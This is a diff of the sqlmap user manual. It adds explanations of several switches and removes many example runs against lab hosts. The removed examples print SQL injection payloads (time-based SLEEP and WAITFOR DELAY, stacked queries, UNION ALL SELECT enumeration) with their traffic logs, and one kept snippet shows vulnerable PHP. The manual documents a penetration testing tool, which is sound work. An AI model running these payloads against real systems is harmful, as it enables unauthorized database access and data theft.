 Switches: <tt>-</tt><tt>-safe-url</tt> and <tt>-</tt><tt>-safe-freq</tt>
 
 <p>
-TODO
+Sometimes web applications or inspection technology in between destroys
+the session if a certain number of unsuccessful requests is performed.
+This might occur during the detection phase of sqlmap or when it exploits
+any of the blind SQL injection types. Reason why is that the SQL payload
+does not necessarily returns output and might therefore raise a signal to
+either the application session management or the inspection technology.
+
+<p>
+To bypass this limitation set by the target, you can provide two switches:
+
+<itemize>
+<item><tt>-</tt><tt>-safe-url</tt>: Url address to visit frequently during
+testing.
+<item><tt>-</tt><tt>-safe-freq</tt>: Test requests between two visits to a
+given safe url.
+</itemize>
+
+<p>
+This way, sqlmap will visit every a predefined number of requests a
+certain <em>safe</em> URL without performing any kind of injection against
+it.
 
 
 <sect1>Optimization
 
 <p>
-These options can be used to optimize the performance of sqlmap.
+These switches can be used to optimize the performance of sqlmap.
 
 
 <sect2>Bundle optimization
@@ -1341,7 +1395,17 @@ These options can be used to optimize the performance of sqlmap.
 Switch: <tt>-o</tt>
 
 <p>
-TODO
+This switch is an alias that implicitly sets the following:
+
+<itemize>
+<item><tt>-</tt><tt>-keep-alive</tt>
+<item><tt>-</tt><tt>-null-connection</tt>
+<item><tt>-</tt><tt>-threads 4</tt>
+<item><tt>-</tt><tt>-group-concat</tt>
+</itemize>
+
+<p>
+Read below for details about every single switch.
 
 
 <sect2>Output prediction
@@ -1383,18 +1447,18 @@ This feature relies on the <htmlurl url="http://en.wikipedia.org/wiki/Multithrea
 name="multi-threading"> concept and inherits both its pro and its cons.
 
 <p>
-This number comes into play when the brute-force switches are provided or
-when the data fetching is done through any of the blind SQL injection
-techniques.
+This features applies to the brute-force switches and when the data
+fetching is done through any of the blind SQL injection techniques.
 For the latter case, sqlmap first calculates the length of the query
-output, then starts the threads. Each thread is assigned to retrieve one
-character of the query output. The thread then ends when that character is
-retrieved.
+output in a single thread, then starts the multi-threading. Each thread is
+assigned to retrieve one character of the query output. The thread ends
+when that character is retrieved - it takes up to 7 HTTP(S) requests with
+the bisection algorithm implemented in sqlmap.
 
 <p>
 Note that the multi-threading switch does not affect any other SQL
-injection technique and that the maximum number of concurrent requests is
-set to <bf>10</bf> for performance and site reliability reasons.
+injection technique. The maximum number of concurrent requests is set to
+<bf>10</bf> for performance and site reliability reasons.
 
 
 <sect2>MySQL GROUP_CONCAT() speed up
@@ -1420,12 +1484,13 @@ Switch: <tt>-p</tt>
 
 <p>
 By default sqlmap tests all <tt>GET</tt> parameters and <tt>POST</tt>
-parameters. When the value of <tt>--level</tt> is >= <bf>2</bf> it tests
-also HTTP <tt>Cookie</tt> header values. When this value is >= <bf>3</bf>
-it tests also HTTP <tt>User-Agent</tt> and HTTP <tt>Referer</tt> header value for SQL injections.
+parameters. When the value of <tt>-</tt><tt>-level</tt> is >= <bf>2</bf>
+it tests also HTTP <tt>Cookie</tt> header values. When this value is >=
+<bf>3</bf> it tests also HTTP <tt>User-Agent</tt> and HTTP <tt>Referer</tt>
+header value for SQL injections.
 It is however possible to manually specify a comma-separated list of
 parameter(s) that you want sqlmap to test. This will bypass the dependence
-on the value of <tt>--level</tt> too.
+on the value of <tt>-</tt><tt>-level</tt> too.
 
 <p>
 For instance, to test for GET parameter <tt>id</tt> and for HTTP
@@ -1517,7 +1582,7 @@ user already knows that query syntax and want to detect and exploit the
 SQL injection by directly providing a injection payload prefix and suffix.
 
 <p>
-Example on vulnerable source code:
+Example of vulnerable source code:
 
 <tscreen><verb>
 $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
@@ -1586,7 +1651,7 @@ Switch: <tt>-</tt><tt>-risk</tt>
 TODO
 
 
-<sect2>Page comparison
+<sect2>TODO: Page comparison
 
 <p>
 Switches: <tt>-</tt><tt>-string</tt> and <tt>-</tt><tt>-regexp</tt>
@@ -1614,85 +1679,6 @@ only.
 This way the distinction will be based upon string presence or regular
 expression match and not page MD5 hash comparison.
 
-Example on a <bf>MySQL 5.0.67</bf> target on a page which content changes
-every second due to a call to PHP function <tt>time()</tt>:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  -v 5
-
-[...]
-[hh:mm:50] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:50] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 192.168.136.131
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 25 Jul 2008 14:29:50 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Connection: close
-Transfer-Encoding: chunked
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;&lt;p&gt;Dynamic content: 1216996190&lt;/p&gt;
-
-[hh:mm:51] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 192.168.136.131
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 25 Jul 2008 14:29:51 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 161
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;&lt;p&gt;Dynamic content: 1216996191&lt;/p&gt;
-
-[hh:mm:51] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 192.168.136.131
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Fri, 25 Jul 2008 14:29:51 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 161
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;&lt;p&gt;Dynamic content: 1216996191&lt;/p&gt;
-
-[hh:mm:51] [ERROR] url is not stable, try with --string or --regexp options, refer to 
-the user's manual paragraph 'Page comparison' for details
-</verb></tscreen>
-
 <p>
 As you can see, the string after <tt>Dynamic content</tt> changes its
 value every second. In the example it is just a call to PHP
@@ -1708,57 +1694,10 @@ on the not injected page content and it is not on the False page content
 displayed on the page content) and passing it to sqlmap, you are able to
 inject anyway.
 
-Example on a <bf>MySQL 5.0.67</bf> target on a page which content changes
-every second due to a call to PHP function <tt>time()</tt>:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  --string "luther" -v 1
-
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if the provided string is within the target URL page content
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-</verb></tscreen>
-
 <p>
 You can also specify a regular expression to match rather than a string if
 you prefer.
 
-Example on a <bf>MySQL 5.0.67</bf> target on a page which content changes
-every second due to a call to PHP function <tt>time()</tt>:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_refresh.php?id=1" \
-  --regexp "<td>lu[\w][\w]er" -v 1
-
-[hh:mm:22] [INFO] testing connection to the target url
-[hh:mm:22] [INFO] testing if the provided regular expression matches within the target 
-URL page content
-[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-</verb></tscreen>
-
 <p>
 As you can see, when one of these options is specified, sqlmap skips the
 URL stability test.
@@ -1772,392 +1711,40 @@ user's input</bf>.
 <sect1>Techniques
 
 <p>
-These options can be used to test for specific SQL injection technique or
-to use one of them to exploit the affected parameter(s) rather than using
-the default blind SQL injection technique.
+These options can be used to tweak how specific SQL injection techniques
+are tested.
 
-<sect2>Test for stacked queries (multiple statements) support
+<sect2>Seconds to delay the DBMS response for time-based blind SQL injection
 
 <p>
-Switch: <tt>-</tt><tt>-stacked-test</tt>
+Switch: <tt>-</tt><tt>-time-sec</tt>
 
 <p>
-It is possible to test if the web application technology supports
-<bf>stacked queries</bf>, multiple statements, on the injectable
-parameter.
+It is possible to set the seconds to delay the response when testing for
+time-based blind SQL injection, by providing the
+<tt>-</tt><tt>-time-sec</tt> option followed by an integer.
+By default delay is set to <bf>5 seconds</bf>.
+
+<sect2>TODO
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" \
-  --stacked-test -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id'
-stacked queries support:	None
-</verb></tscreen>
+Switch: <tt>-</tt><tt>-union-cols</tt>
 
 <p>
-By default PHP builtin function <tt>mysql_query()</tt> does not support
-multiple statements.
-Multiple statements is a feature supported by default only by some
-web application technologies in relation to the back-end database
-management system. For instance, as you can see from the next example,
-where PHP does not support them on MySQL, it does on PostgreSQL.
+TODO
+
+<sect2>TODO
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
-  --stacked-test -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id'
-stacked queries support:    'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
-</verb></tscreen>
+Switch: <tt>-</tt><tt>-union-char</tt>
 
 <p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" \
-  --stacked-test -v 1
-
-[...]
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
-stacked queries support:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
-</verb></tscreen>
-
-
-<sect2>Test for time based blind SQL injection
-
-<p>
-Switches: <tt>-</tt><tt>-time-test</tt> and <tt>-</tt><tt>-time-sec</tt>
-
-<p>
-It is possible to test if the target URL is affected by a <bf>time based
-blind SQL injection</bf> vulnerability.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" \
-  --time-test -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND 
-condition syntax
-[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection 
-with AND condition syntax
-time based blind sql injection payload:    'id=1 AND SLEEP(5) AND 5249=5249'
-</verb></tscreen>
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
-  --time-test -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND 
-condition syntax
-[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql 
-injection with AND condition syntax
-[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked 
-query syntax
-[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection 
-with stacked query syntax
-time based blind sql injection payload:    'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" \
-  --time-test -v 1
-
-[...]
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with AND 
-condition syntax
-[hh:mm:59] [WARNING] the parameter 'name' is not affected by a time based blind sql 
-injection with AND condition syntax
-[hh:mm:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked 
-query syntax
-[hh:mm:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with 
-stacked query syntax
-time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 
-'PmrXn'='PmrXn'
-</verb></tscreen>
-
-<p>
-It is also possible to set the seconds to delay the response by providing
-the <tt>-</tt><tt>-time-sec</tt> option followed by an integer. By default delay
-is set to five seconds.
-
-
-<sect2>Test for UNION query SQL injection
-
-<p>
-Switches: <tt>-</tt><tt>-union-test</tt> and <tt>-</tt><tt>-union-tech</tt>
-
-<p>
-It is possible to test if the target URL is affected by a <bf>UNION query
-(inband) SQL injection</bf> vulnerability.
-Refer to the <em>Techniques</em> section for details on this SQL injection
-technique.
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.136.131/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
-</verb></tscreen>
-
-<p>
-By default sqlmap uses the <bf><tt>NULL</tt> bruteforcing</bf> technique to
-detect the number of columns within the original <tt>SELECT</tt> statement.
-It is also possible to change it to <bf><tt>ORDER BY</tt> clause
-bruteforcing</bf> with the <tt>-</tt><tt>-union-tech</tt> option.
-
-<p>
-Further details on these techniques can be found <htmlurl
-url="http://bernardodamele.blogspot.com/2007/07/insight-on-union-query-sql-injection.html" name="here">.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_str.php?id=1" \
-  --union-test --union-tech orderby -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
-bruteforcing technique
-[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.136.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
-1262=1262'
-</verb></tscreen>
-
-<p>
-As you can see, the target URL parameter <tt>id</tt> might be also
-exploitable by the inband SQL injection technique.
-In case a case it is strongly recommended to use this technique which saves
-a lot of time.
-
-<p>
-It is strongly recommended to run at least once sqlmap with the
-<tt>-</tt><tt>-union-test</tt> option to test if the affected parameter is used
-within a <tt>for</tt> cycle, or similar, and in case use
-<tt>-</tt><tt>-union-use</tt> option to exploit this vulnerability because it
-saves a lot of time and it does not weight down the web server log file
-with hundreds of HTTP requests.
-
-
-<sect2>Use the UNION query SQL injection
-
-<p>
-Switch: <tt>-</tt><tt>-union-use</tt>
-
-<p>
-Providing the <tt>-</tt><tt>-union-use</tt> parameter, sqlmap will first test if
-the target URL is affected by an <bf>inband SQL injection</bf>
-(<tt>-</tt><tt>-union-test</tt>) vulnerability then, in case it seems to be
-vulnerable, it will confirm that the parameter is affected by a <bf>Full
-UNION query SQL injection</bf> and use this technique to go ahead with the
-exploiting.
-If the confirmation fails, it will check if the parameter is affected by
-a <bf>Partial UNION query SQL injection</bf>, then use it to go ahead if it
-is vulnerable.
-In case the inband SQL injection vulnerability is not exploitable, sqlmap
-will automatically fallback on the blind SQL injection technique to go
-ahead.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -v 2 \
-  --union-use --banner
-
-[...]
-back-end DBMS:	Microsoft SQL Server 2000
-
-[hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection 
-vulnerability
-[hh:mm:42] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
-CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
-CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [DEBUG] performed 3 queries in 0 seconds
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-	Aug  6 2000 00:57:48 
-	Copyright (c) 1988-2000 Microsoft Corporation
-	Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
-</verb></tscreen>
-
-<p>
-As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
-blind SQL injection and exploitable full inband SQL injection
-vulnerabilities.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 5 \
-  --union-use --current-user
-
-[...]
-[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
-IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)), 
-NULL# AND 8032=8032
-[hh:mm:29] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%28112
-%2C110%2C121%2C77%2C88%2C86%29%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29
-%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
-%208032=8032 HTTP/1.1
-Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.136.131
-Accept-language: en-us,en;q=0.5
-Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
-image/png,*/*;q=0.5
-User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Tue, 16 Dec 2008 hh:mm:29 GMT
-Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9 
-OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
-X-Powered-By: PHP/5.2.6-2ubuntu4
-Content-Length: 194
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;pnyMXVtestuser@localhostHYKMyg&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;
-
-[hh:mm:29] [DEBUG] performed 3 queries in 0 seconds
-current user:    'testuser@localhost'
-</verb></tscreen>
-
-<p>
-As you can see, the MySQL <tt>CURRENT_USER()</tt> function (--current-user)
-output is nested, inband, within the HTTP response page, this makes the
-inband SQL injection exploited.
-
-<p>
-In case the inband SQL injection is not fully exploitable, sqlmap will
-check if it is partially exploitable: this occurs if the query output
-is not parsed within a <tt>for</tt>, or similar, cycle but only the first
-entry is displayed in the page content.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_partialunion.php?id=1" -v 2 \
-  --union-use --dbs
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:56] [INFO] fetching database names
-[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
-[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection 
-vulnerability
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
-IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL 
-FROM information_schema.SCHEMATA# AND 1062=1062
-[hh:mm:56] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:56] [INFO] the SQL query provided returns 4 entries
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
-[hh:mm:56] [DEBUG] performed 7 queries in 0 seconds
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
-[hh:mm:56] [DEBUG] performed 8 queries in 0 seconds
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
-[hh:mm:56] [DEBUG] performed 9 queries in 0 seconds
-[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
-CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
-information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
-[hh:mm:56] [DEBUG] performed 10 queries in 0 seconds
-available databases [4]:
-[*] information_schema
-[*] mysql
-[*] privatedb
-[*] testdb
-</verb></tscreen>
-
-<p>
-As you can see, sqlmap identified that the parameter is affected by a
-partial inband SQL injection. Consequently, it counted the number of query
-output entries and retrieved them once per time. It forces the parameter
-(<tt>id</tt>) value <tt>1</tt> to its negative value <tt>-1</tt> so that
-it does not return, presumibly, any output. That leaves our own <tt>UNION ALL
-SELECT</tt> statement to produce one entry at a time and display only it in 
-the page content.
+TODO
 
 
 <sect1>Fingerprint
 
-<sect2>Extensive database management system fingerprint
+<sect2>TODO: Extensive database management system fingerprint
 
 <p>
 Switches: <tt>-f</tt> or <tt>-</tt><tt>-fingerprint</tt>
@@ -2175,22 +1762,6 @@ After identifying an injectable vector, sqlmap fingerprints the back-end
 database management system and go ahead with the injection with its
 specific syntax within the limits of the database architecture.
 
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 1
-
-[...]
-[hh:mm:17] [INFO] testing MySQL
-[hh:mm:17] [INFO] confirming MySQL
-[hh:mm:17] [INFO] retrieved: 5
-[hh:mm:17] [INFO] the back-end DBMS is MySQL
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-</verb></tscreen>
-
 <p>
 As you can see, sqlmap automatically fingerprints the web server operating
 system and the web application technology by parsing some HTTP response headers.
@@ -2200,205 +1771,19 @@ If you want to perform an extensive database management system fingerprint
 based on various techniques like specific SQL dialects and inband error
 messages, you can  provide the <tt>-</tt><tt>-fingerprint</tt> option.
 
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:49] [INFO] testing MySQL
-[hh:mm:49] [INFO] confirming MySQL
-[hh:mm:49] [INFO] retrieved: 3
-[hh:mm:49] [INFO] the back-end DBMS is MySQL
-[hh:mm:49] [INFO] retrieved: 
-[hh:mm:49] [INFO] retrieved: 
-[hh:mm:49] [INFO] retrieved: t
-[hh:mm:49] [INFO] executing MySQL comment injection fingerprint
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
-               comment injection fingerprint: MySQL 5.0.67
-               html error message fingerprint: MySQL
-</verb></tscreen>
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:38] [WARNING] the back-end DMBS is not MySQL
-[hh:mm:38] [INFO] testing Oracle
-[hh:mm:38] [INFO] confirming Oracle
-[hh:mm:38] [INFO] the back-end DBMS is Oracle
-[hh:mm:38] [INFO] retrieved: 10
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: active fingerprint: Oracle 10g
-               html error message fingerprint: Oracle
-</verb></tscreen>
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:14] [WARNING] the back-end DMBS is not Oracle
-[hh:mm:14] [INFO] testing PostgreSQL
-[hh:mm:14] [INFO] confirming PostgreSQL
-[hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
-[hh:mm:14] [INFO] retrieved: 2
-[hh:mm:14] [INFO] retrieved: 
